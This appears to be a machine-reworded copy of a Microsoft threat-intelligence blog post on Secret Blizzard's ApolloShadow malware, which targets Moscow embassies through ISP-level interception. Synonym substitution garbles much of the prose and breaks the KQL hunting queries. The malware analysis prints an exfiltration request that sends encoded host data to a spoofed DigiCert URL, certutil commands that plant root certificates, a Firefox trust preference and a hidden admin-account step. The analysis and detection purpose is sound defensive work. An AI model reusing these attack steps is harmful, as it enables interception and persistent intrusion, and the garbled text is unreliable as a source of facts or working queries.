Microsoft Risk Intelligence has uncovered a cyberespionage marketing campaign by the Russian state actor we observe as Secret Blizzard that has been focusing on embassies positioned in Moscow utilizing an adversary-in-the-middle (AiTM) place to deploy their customized ApolloShadow malware. ApolloShadow has the potential to put in a trusted root certificates to trick units into trusting malicious actor-controlled websites, enabling Secret Blizzard to keep up persistence on diplomatic units, seemingly for intelligence assortment. This marketing campaign, which has been ongoing since not less than 2024, poses a excessive danger to overseas embassies, diplomatic entities, and different delicate organizations working in Moscow, notably to these entities who depend on native web suppliers.
Whereas we beforehand assessed with low confidence that the actor conducts cyberespionage actions inside Russian borders in opposition to overseas and home entities, that is the primary time we are able to affirm that they’ve the potential to take action on the Web Service Supplier (ISP) stage. Which means that diplomatic personnel utilizing native ISP or telecommunications companies in Russia are extremely seemingly targets of Secret Blizzard’s AiTM place inside these companies. In our earlier weblog, we reported the actor seemingly leverages Russia’s home intercept programs such because the System for Operative Investigative Actions (SORM), which we assess could also be integral in facilitating the actor’s present AiTM exercise, judging from the large-scale nature of those operations.
This weblog supplies steerage on how organizations can defend in opposition to Secret Blizzard’s AiTM ApolloShadow marketing campaign, together with forcing or routing all site visitors via an encrypted tunnel to a trusted community or utilizing another supplier—similar to a satellite-based connection—hosted inside a rustic that doesn’t management or affect the supplier’s infrastructure. The weblog additionally supplies extra info on community protection, similar to suggestions, indicators of compromise (IOCs), and detection particulars.
Secret Blizzard is attributed by the USA Cybersecurity and Infrastructure Company (CISA) as Russian Federal Safety Service (Middle 16). Secret Blizzard additional overlaps with risk actors tracked by different safety distributors by names similar to VENOMOUS BEAR, Uroburos, Snake, Blue Python, Turla, Wraith, ATG26, and Waterbug.
As a part of our steady monitoring, evaluation, and reporting of the risk panorama, we’re sharing our observations on Secret Blizzard’s newest exercise to boost consciousness of this actor’s tradecraft and educate organizations on harden their assault floor in opposition to this and comparable exercise. Though this exercise poses a excessive danger to entities inside Russia, the protection measures included on this weblog are broadly relevant and will help organizations in any area scale back their danger from comparable threats. Microsoft can also be monitoring different teams utilizing comparable methods, together with these documented by ESET in a earlier publication.
AiTM and ApolloShadow deployment
In February 2025, Microsoft Risk Intelligence noticed Secret Blizzard conducting a cyberespionage marketing campaign in opposition to overseas embassies positioned in Moscow, Russia, utilizing an AiTM place to deploy the ApolloShadow malware to keep up persistence and accumulate intelligence from diplomatic entities. An adversary-in-the-middle method is when an adversary positions themself between two or extra networks to assist follow-on exercise. The Secret Blizzard AiTM place is probably going facilitated by lawful intercept and notably consists of the set up of root certificates beneath the guise of Kaspersky Anti-Virus (AV). We assess this enables for TLS/SSL stripping from the Secret Blizzard AiTM place, rendering the vast majority of the goal’s shopping in clear textual content together with the supply of sure tokens and credentials. Secret Blizzard has exhibited comparable methods in previous cyberespionage campaigns to contaminate overseas ministries in Japanese Europe by tricking customers to obtain a trojanized Flash installer from an AiTM place.
Preliminary entry
On this most up-to-date marketing campaign, the preliminary entry mechanism utilized by Secret Blizzard is facilitated by an AiTM place on the ISP/Telco stage inside Russia, through which the actor redirects goal units by placing them behind a captive portal. Captive portals are legit net pages designed to handle community entry, similar to these encountered when connecting to the web at a lodge or airport. As soon as behind a captive portal, the Home windows Check Connectivity Standing Indicator is initiated—a legit service that determines whether or not a tool has web entry by sending an HTTP GET request to hxxp://www.msftconnecttest(.)com/redirect which ought to direct to msn(.)com.
Supply and set up
As soon as the system opens the browser window to this tackle, the system is redirected to a separate actor-controlled area that seemingly shows a certificates validation error which prompts the goal to obtain and execute ApolloShadow. Following execution, ApolloShadow checks for the privilege stage of the ProcessToken and if the gadget isn’t operating on default administrative settings, then the malware shows the person entry management (UAC) pop-up window to immediate the person to put in certificates with the file title CertificateDB.exe, which masquerades as a Kaspersky installer to put in root certificates and permit the actor to realize elevated privileges within the system.
Determine 1. Secret Blizzard AiTM an infection chain
ApolloShadow malware
ApolloShadow makes use of two execution paths relying on the privilege stage of the operating course of. The token of the operating course of is retrieved utilizing the API GetTokenInformationType and the worth of TokenInformation is checked to see if the token incorporates the TokenElevationTypeFulltype. If it doesn’t have that privilege stage, ApolloShadow executes a low privilege execution path.
Determine 2. ApolloShadow execution move
Low privilege execution
When executing the low privilege path, the primary motion is to gather details about the host to ship again to the AiTM managed command and management (C2). First, the host’s IP info is collected utilizing the API GetIpAddrTable, which collects info from the IpAddrTable. Every entry is individually Base64-encoded and delineated by a pipe character with rn appended, then mixed into one string. For instance:
172.29.162(.)128 00-15-5D-04-04-1C
127.0.0(.)1
“|MTcyLjI5LjE2Mi4xMjggMDAtMTUtNUQtMDQtMDQtMUM=|rn|MTI3LjAuMC4xIA==|rn”
Then your entire string is Base64-encoded as soon as once more in preparation for exfiltration to the C2 host:
“fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo=”
The encoded community info is added as a question string to a GET request with the vacation spot URL hxxp://timestamp.digicert(.)com/registered. Two question parameters are included with the request, code and t. The Code parameters incorporates a hardcoded set of characters and the t variable has the encoded IP tackle info, as proven under:
code=DQBBBBBBBBBOBBBBBBBBBBgBBBBBBBBBny_t???????t=fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo=
Whereas the timestamp subdomain does exist for Digicert, the /registered useful resource doesn’t. As a result of AiTM place of the actor, Secret Blizzard can use DNS manipulation to redirect legitimate-looking communication to the actor-controlled C2 and return an encoded VBScript because the second-stage payload.
When the response comes again from the redirected Digicert request, the file title that’s used to put in writing the script to disk is decoded to be used. ApolloShadow makes use of string obfuscation in a number of locations all through the binary to cover vital strings. These strings are blocks of encoded characters which might be encoded utilizing XOR with a separate set of hardcoded constants. Whereas this isn’t a very refined method, it is sufficient to obscure the strings from view at first look. The strings are decoded as they’re used after which re-encoded after use to take away traces of the strings from reminiscence.
Determine 2. String decoding operation for VB script title
The decoded file title is edgB4ACD.vbs and the file title string is concatenated by the malware with the outcomes of querying the atmosphere variable for the TEMP listing to create the trail for the goal script. We have been unable to get well the script, however the header of the response is checked for the primary 12 characters to see if it matches the string MDERPWSAB64B. As soon as ApolloShadow has correctly decoded the script, it executes the script utilizing the Home windows API name CreateProcessW with the command line to launch wscript and the trail to edgB4ACD.vbs.
Lastly, the ApolloShadow course of launches itself once more utilizing ShellExecuteA, which presents the person with an UAC window to bypass UAC mechanisms and immediate the person to grant the malware the best privileges accessible to the person.
Determine 3. UAC popup to request elevated privileges from the person
Elevated privilege execution
When the method is executed with enough elevated privileges, ApolloShadow alters the host by setting all networks to Non-public. This induces a number of modifications together with permitting the host gadget to change into discoverable, and enjoyable firewall guidelines to allow file sharing. Whereas we didn’t see any direct makes an attempt for lateral motion, the primary motive for these modifications is prone to scale back the problem of lateral motion on the community. ApolloShadow makes use of two totally different strategies to carry out this variation.
The primary methodology is thru the registry settings for NetworkProfiles: SOFTWAREMicrosoftHome windows NTCurrentVersionNetworkListProfiles. The community’s globally distinctive identifiers (GUIDs) are parsed for every linked community, and the malware modifies the worth Class by setting it to 0. This transformation units the profile of the community to Non-public after the host has been rebooted.
Determine 4. Registry settings for community profiles
The second methodology straight units firewall guidelines utilizing Part Object Mannequin (COM) objects that allow file sharing and activate community discovery. A number of strings are decoded utilizing the identical methodology as above and concatenated to create the firewall guidelines they need to modify.
FirewallAPI.dll,-32752
This command permits the Community Discovery rule group
FirewallAPI.dll,-28502
This command permits all guidelines within the File and Printer Sharing group
The strings are handed to the COM objects to allow the principles if they don’t seem to be already enabled.
Determine 5. COM objects used to change firewall guidelines
Each methods have some crossover, however the next desk supplies a comparability overview of every methodology.
TechniquePurposeTimingStealthEffectRegistry profile changeSets community to PrivateRequires rebootHighBroadly relaxes firewall postureCOM-based rule enablementActivates particular rulesImmediateModerateOpens exact ports for discovery and sharing
From right here, ApolloShadow presents the person with a window displaying that the certificates are being put in.
Determine 6. Window exhibited to the person throughout execution
A brand new thread performs the rest of the performance. The 2 root certificates being put in are written to the %TEMP% listing with a short lived title and the extension crt. The certificates set up is carried out through the use of the Home windows certutil utility and the momentary information are deleted following the execution of the instructions.
certutil.exe -f -Enterprise -addstore root “C:CustomersAppDataLocalTempcrt3C5C.tmp”
certutil.exe -f -Enterprise -addstore ca “C:CustomersAppDataLocalTempcrt53FF.tmp”
The malware should add a choice file to the Firefox choice listing as a result of Firefox makes use of totally different certificates shops than browsers similar to Chromium, which ends up in Firefox not trusting the foundation and enterprise retailer by default. ApolloShadow reads the registry key that factors to the set up of the appliance and builds a path to the choice listing from there. A file is written to disk known as wincert.js containing a choice modification for Firefox browsers, permitting Firefox to belief the foundation certificates added to the working system’s certificates retailer.
pref(“safety.enterprise_roots.enabled”, true);” privilege
The ultimate step is to create an administrative person with the username UpdatusUser and a hardcoded password on the contaminated system utilizing the Home windows API NetUserAdd. The password can also be set to by no means expire.
Determine 7. Administrator person added to contaminated system
ApolloShadow has efficiently put in itself on the contaminated host and has persistent entry utilizing the brand new native administrator person.
Defending in opposition to Secret Blizzard exercise
Microsoft recommends that each one clients, however particularly delicate organizations working in Moscow, ought to implement the next suggestions to mitigate in opposition to Secret Blizzard exercise.
Route all site visitors via an encrypted tunnel to a trusted community or use a digital non-public community (VPN) service supplier, similar to a satellite-based supplier, whose infrastructure isn’t managed or influenced by exterior events.
Microsoft additionally recommends the next steerage to reinforce safety and mitigate potential threats:
Observe the precept of least privilege, use multifactor authentication (MFA), and audit privileged account exercise in your environments to gradual and cease attackers. Keep away from the usage of domain-wide, admin-level service accounts and prohibit native administrative privileges. These mitigation steps scale back the paths that attackers have accessible to them to perform their targets and decrease the chance of the compromise spreading in your atmosphere.
Usually evaluate extremely privileged teams like Directors, Distant Desktop Customers, and Enterprise Admins. Risk actors could add accounts to those teams to keep up persistence and disguise their exercise.
Activate cloud-delivered safety in Microsoft Defender Antivirus or the equal to your antivirus product to cowl quickly evolving attacker instruments and methods.
Run endpoint detection and response (EDR) in block mode, in order that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the risk or when Microsoft Defender Antivirus is operating in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Activate assault floor discount guidelines to forestall frequent assault methods. These guidelines, which might be configured by all Microsoft Defender Antivirus clients and never simply these utilizing the EDR answer, provide vital hardening in opposition to frequent assault vectors.
Block execution of doubtless obfuscated scripts
Microsoft Defender XDR detections
Microsoft Defender XDR clients can discuss with the record of relevant detections under. Microsoft Defender XDR coordinates detection, prevention, investigation, and response throughout endpoints, identities, e-mail, apps to supply built-in safety in opposition to assaults just like the risk mentioned on this weblog.
Prospects with provisioned entry may also use Microsoft Safety Copilot in Microsoft Defender to analyze and reply to incidents, hunt for threats, and defend their group with related risk intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this risk as the next malware:
Microsoft Defender for Endpoint
The next alerts would possibly point out risk exercise associated to this risk. Be aware, nonetheless, that these alerts might be additionally triggered by unrelated risk exercise.
Secret Blizzard Actor exercise detected
Suspicious root certificates set up
Suspicious certutil exercise
Consumer account created beneath suspicious circumstances
A script with suspicious content material was noticed
Microsoft Safety Copilot
Safety Copilot clients can use the standalone expertise to create their very own prompts or run the next pre-built promptbooks to automate incident response or investigation duties associated to this risk:
Incident investigation
Microsoft Consumer evaluation
Risk actor profile
Risk Intelligence 360 report based mostly on MDTI article
Vulnerability influence evaluation
Be aware that some promptbooks require entry to plugins for Microsoft merchandise similar to Microsoft Defender XDR or Microsoft Sentinel.
Risk intelligence studies
Microsoft clients can use the next studies in Microsoft merchandise to get essentially the most up-to-date details about the risk actor, malicious exercise, and methods mentioned on this weblog. These studies present the intelligence, safety info, and really useful actions to forestall, mitigate, or reply to related threats present in buyer environments.
Microsoft Defender Risk Intelligence
Microsoft Safety Copilot clients may also use the Microsoft Safety Copilot integration in Microsoft Defender Risk Intelligence, both within the Safety Copilot standalone portal or within the embedded expertise within the Microsoft Defender portal to get extra details about this risk actor.
Looking queries
Microsoft Defender XDR
Microsoft Defender XDR clients can run the next question to search out associated exercise of their networks:
Floor units that try to obtain a file inside two minutes after captive portal redirection. This exercise could point out a primary stage AiTM assault—such because the one utilized by Secret Blizzard—in opposition to a tool.
let CaptiveRedirectEvents = DeviceNetworkEvents
| the place RemoteUrl incorporates “msftconnecttest.com/redirect”
| venture DeviceId, RedirectTimestamp = Timestamp, RemoteUrl;
let FileDownloadEvents = DeviceFileEvents
| the place ActionType == “FileDownloaded”
| venture DeviceId, DownloadTimestamp = Timestamp, FileName, FolderPath; CaptiveRedirectEvents
| be part of form=interior (FileDownloadEvents) on DeviceId
| the place DownloadTimestamp between (RedirectTimestamp .. (RedirectTimestamp + 2m))
| venture DeviceId, RedirectTimestamp, RemoteUrl, DownloadTimestamp, FileName, FolderPath
Microsoft Sentinel
Microsoft Sentinel clients can use the TI Mapping analytics (a sequence of analytics all prefixed with ‘TI map’) to robotically match the malicious area indicators talked about on this weblog submit with knowledge of their workspace. If the TI Map analytics will not be presently deployed, clients can set up the Risk Intelligence answer from the Microsoft Sentinel Content material Hub to have the analytics rule deployed of their Sentinel workspace.
Under are the queries utilizing Sentinel Superior Safety Info Mannequin (ASIM) features to hunt threats throughout each Microsoft first occasion and third-party knowledge sources. ASIM additionally helps deploying parsers to particular workspaces from GitHub, utilizing an ARM template or manually.
Detect community IP and area indicators of compromise utilizing ASIM
The under question checks IP addresses and area indicators of compromise (IOCs) throughout knowledge sources supported by ASIM Community session parser.
//IP record and area list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic((“45.61.149.109”));
let ioc_domains = dynamic((“kav-certificates.information”));
_Im_NetworkSession(starttime=todatetime(in the past(lookback)), endtime=now())
| the place DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=rely() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect community and information hashes indicators of compromise utilizing ASIM
The under queries will verify IP addresses and file hash IOCs throughout knowledge sources supported by ASIM Net session parser.
Detect community indicators of compromise and domains utilizing ASIM
//IP record – _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic((“45.61.149.109”));
let ioc_sha_hashes =dynamic((“13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20”));
_Im_WebSession(starttime=todatetime(in the past(lookback)), endtime=now())
| the place DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=rely() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
// Area record – _Im_WebSession
let ioc_domains = dynamic((“kav-certificates.information”));
_Im_WebSession (url_has_any = ioc_domains)
Detect information hashes indicators of compromise utilizing ASIM
The under question will verify IP addresses and file hash IOCs throughout knowledge sources supported by ASIM FileEvent parser.
Detect community and information hashes indicators of compromise utilizing ASIM
// file hash record – imFileEvent
let ioc_sha_hashes =dynamic((“13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20″));
imFileEvent
| the place SrcFileSHA256 in (ioc_sha_hashes) or
TargetFileSHA256 in (ioc_sha_hashes)
| lengthen AccountName = tostring(break up(Consumer, @”)(1)),
AccountNTDomain = tostring(break up(Consumer, @”)(0))
| lengthen AlgorithmType = “SHA256”
Indicators of compromise
IndicatorTypeDescriptionkav-certificates(.)infoDomainActor-controlled area that downloads the malware45.61.149(.)109IP addressActor-controlled IP address13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20SHA256ApolloShadow malwareCertificateDB.exeFile nameFile title related to ApolloShadow pattern
References
Acknowledgments
Study extra
Meet the consultants behind Microsoft Risk Intelligence, Incident Response, and the Microsoft Safety Response Middle at our VIP Mixer at Black Hat 2025. Uncover how our end-to-end platform will help you strengthen resilience and elevate your safety posture.
For the newest safety analysis from the Microsoft Risk Intelligence neighborhood, try the Microsoft Risk Intelligence Weblog.
To get notified about new publications and to hitch discussions on social media, comply with us on LinkedIn, X (previously Twitter), and Bluesky.
To listen to tales and insights from the Microsoft Risk Intelligence neighborhood concerning the ever-evolving risk panorama, take heed to the Microsoft Risk Intelligence podcast.
